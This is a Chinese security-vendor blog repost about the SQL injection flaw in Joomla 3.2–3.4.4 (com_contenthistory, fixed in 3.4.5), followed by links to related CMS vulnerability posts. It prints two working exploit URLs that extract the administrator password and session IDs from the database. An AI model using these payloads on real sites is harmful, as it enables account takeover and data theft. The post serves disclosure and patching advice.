知名CMS软件Joomla 存SQL注入漏洞

最新推荐文章于 2024-07-06 18:54:02 发布
最新推荐文章于 2024-07-06 18:54:02 发布
阅读量533 收藏
点赞数
文章标签: php python
原文链接:https://my.oschina.net/safedog/blog/521352
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

  近日,Trustwave SpiderLabs 研究员Asaf Orpani 发现知名CMS Joomla 3.2—3.4.4版本中存在SQL注入漏洞,经安全狗实验室检测该漏洞危害巨大,影响范围广,利用难度低。目前官方已在3.4.5版本中修复该漏洞,请相关网站及时更新。另外,经测试安全狗可防御该漏洞。

漏洞详细说明与利用方法

据 Asaf Orpani 分析得出,该SQL注入漏洞存在于

/administrator /components /com_contenthistory/ models/history.php 处。

  以下几行描述Joomla原理的代码则可以帮助我们去利用这个漏洞(Payload)

执行该段代码之后返回页面如下,可直接获取用户session:

经测试可用如下payload直接获取管理员密码:

http://10.211.55.3/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

如图示:

以上payload不能爆session_id,经过我们实验室修改后下面这段可以完美爆session_id 。

/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]= (select 1=updatexml(1,concat(0x5e24,(select session_id from jml_session limit 0,1),0x5e24),1))

如下图所示:

  而在详细的了解了该漏洞的利用原理之后,安全狗相关技术人员进行了检测,最终发现安全狗旗下产品网站安全狗可防御该漏洞,请广大用户放心使用。



转载于:https://my.oschina.net/safedog/blog/521352

weixin_33709219
关注
漏洞复现】熊海cms sql注入 附poc
失心少年
11-26 1226
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。其采用前后端整合设计思路,php,Apache,mysql,前端使用Bootstrap和少许jquery前端框架开发;熊海CMS 是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。
铭飞CMS SQL注入漏洞复现(CNVD-2024-06148)
0xSec
04-30 813
由于铭飞CMS文章列表接口content/list.do中的sqlWhere参数缺少对外部输入SQL语句的验证,未经身份验证的攻击者可利用该漏洞获取数据库敏感数据,进一步利用可获取服务器权限。
答疑sql注入php168cms
08-15
cms问题答疑处sql注入,可sqlmap跑数据库。。。
审计一套CMS中的SQL注入
weixin_30790841的博客
08-07 353
漏洞分为系统漏洞和应用漏洞,系统漏洞以二进制漏洞为代表,其挖掘难度较高需要对反汇编和操作系统原理深入理解,而除了系统漏洞以外还有一些应用漏洞,包括不限MySQL,Apache,为代表的Web漏洞,这里我们就挖掘PHP代码层面的漏洞漏洞的挖掘也分为,点对点挖掘漏洞,和分散式挖掘漏洞,这我们主要使用点对点挖掘,在挖掘是我们需要找一些关键字,漏洞本身就是两个条件,可控的函数,和可控的变量...
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
最新发布
m0_68045701的博客
07-06 616
Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。Joomla!3.7.0版本中的com_fields组件SQL注入漏洞,远程攻击者无需任何身份认证,可获取数据库敏感信息,包括管理员登录信息并控制网站后台。
PHP代码审计』飓风CMS1.10SQL注入漏洞
Ho1aAs‘s Blog
06-11 540
文章目录前言一、漏洞演示二、漏洞分析三、利用四、修复五、总结完 前言 作者:Ho1aAs 博客:https://blog.csdn.net/xxy605 一、漏洞演示 其他管理——TAG专题,点击提交添加tag 抓包 POST /x/admin/ajax.php?xhash=599b40fe938db62cf441b4dc7d2fa3e7 HTTP/1.1 Host: testcms.com Content-Length: 169 Accept: application/json, text/java
Joomla SQL注入漏洞(CVE-2018-8045)复现
玄道的网安博客
09-29 2092
简介 Joomla!是一套全球知名的内容管理系统。Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统 影响版本 joomla版本 v3.5.0 ~ v3.8.5 漏洞原理 可以看到对filter.category_id这个参数进行了一个强制int类型转换 也就是说漏洞发生在此参数上 根据notes.php,触发的代码为 $categoryId这个参数没有经过任何过滤直接拼接到了sql语句中,造成sql注入 环境搭建 下载地址https:/...
CVE-2015-7857 Joomla注入漏洞利用工具
04-18
CVE-2015-7857,又称为“Joomla SQL注入漏洞”,是由于Joomla在处理特定的用户输入时,没有进行足够的数据验证和过滤,导致恶意用户可能通过构造恶意请求来执行SQL命令。这个漏洞主要影响Joomla 3.2.0至3.2.3版本,...
joomla cms 3.2-3.44 前台sql注入结果分析
06-08
对于 Joomla CMS 3.2-3.4.4 的前台 SQL 注入漏洞,攻击者可以通过构造恶意的 SQL 语句来绕过应用程序的身份验证和访问控制,从而获取敏感信息或者修改、删除、添加数据。 攻击者可以利用 SQL 注入漏洞执行各种恶意...
请介绍SQL注入漏洞检测、XSS漏洞检测、端口扫描与服务发现技术、CMS技术,
05-16
1. SQL注入漏洞检测: SQL注入是一种针对Web应用程序的攻击技术,通过在Web应用程序中注入SQL命令来实现对数据库的非法访问。SQL注入漏洞检测可以通过在输入参数中注入特定的SQL语句来测试Web应用程序是否容易受到...
Vulnhub靶场渗透测试系列DC-3(Joomla CMS漏洞和Ubuntu16.04漏洞)
qq_45722813的博客
12-07 3050
Vulnhub靶场渗透测试DC-3 靶机下载地址:https://www.five86.com/dc-3.html 攻击机为kali2021,IP地址:192.168.172.131 将靶机导入到VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用nmap进行活主机发现来获取靶机IP地址,命令nmap -T4 -Pn 192.168.172.1/24 但是发现没有扫描到靶机IP,可能是靶机网络设置问题,参考文章:https://editor.csdn.net/md/?artic
Joomla 3.2.0 - 3.4.4 无限制SQL注入漏洞
weixin_34212189的博客
10-24 250
http://www.sebug.net/vuldb/ssvid-89680#0-tsina-1-18081-397232819ff9a47a7b7e80a40613cfe1 http://10.211.55.3/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&it...
Taocms SQL注入(CVE-2021-44915)复现--春秋云镜靶场
m7789的博客
11-24 1066
Taocms 3.0.2版本SQL注入漏洞。该漏洞源于应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞通过功能编辑类别进行SQL注入
cms文件管理系统靶场的手动SQL注入
qq_42589016的博客
06-17 2193
CSM文件管理系统SQL注入
铭飞CMS list 接口 SQL注入漏洞复现
0xSec
12-14 1004
铭飞CMS在5.2.10版本以前list 接口处sql注入漏洞,能够利用该漏洞获取敏感信息,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
Joomla未授权访问漏洞CVE-2023-23752
dahege666的博客
03-23 3116
漏洞复现
狮子鱼cms-sql注入漏洞复现
weixin_68647219的博客
09-06 2903
工作发现,狮子鱼cmssql注入漏洞,该漏洞是由于狮子鱼CMS ApiController.class.php 参数过滤在不严谨可能导致SQL注入漏洞
【1day】PHPOK cms SQL注入学习
记录并分享学习安全的知识点..
09-01 829
PHPOK CMS是一个基于PHP语言开发的开源内容管理系统(CMS)。它提供了一个强大的平台,用于创建和管理网站内容。PHPOK CMS具有灵活的模块化架构,可以根据网站的需求进行定制和扩展。PHPOK CMSSQL注入漏洞,攻击者通过在输入字段中注入恶意SQL代码,从而绕过应用程序的身份验证和访问数据库,可能导致数据泄露、数据损坏、系统崩溃等严重后果。
Joomla CMS 3.2-3.4.4 SQL注入 漏洞分析
weixin_34281537的博客
03-08 547
RickGray · 2015/10/26 11:24昨日,Joomla CMS发布新版本3.4.5,该版本修复了一个高危的SQL注入漏洞,3.2至3.4.4版本都受到影响。攻击者通过该漏洞可以直接获取获取数据库中敏感信息,甚至可以获取已登陆的管理员会话直接进入网站后台。0x01 原理分析在 Joomla CMS 中有一个查看历史编辑版本的组件(com_contenthistory),该功能本应只...
浅析JoomlaSQL注入攻击及防御策略
"基于JoomlaSQL注入攻击" SQL注入攻击是黑客对数据库进行攻击的常用手段之一。在B/S模式应用开发中,许多程序员在编写代码时,没有对用户输入数据的合法性进行判断,这使得非法用户可以提交一段数据库查询代码,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值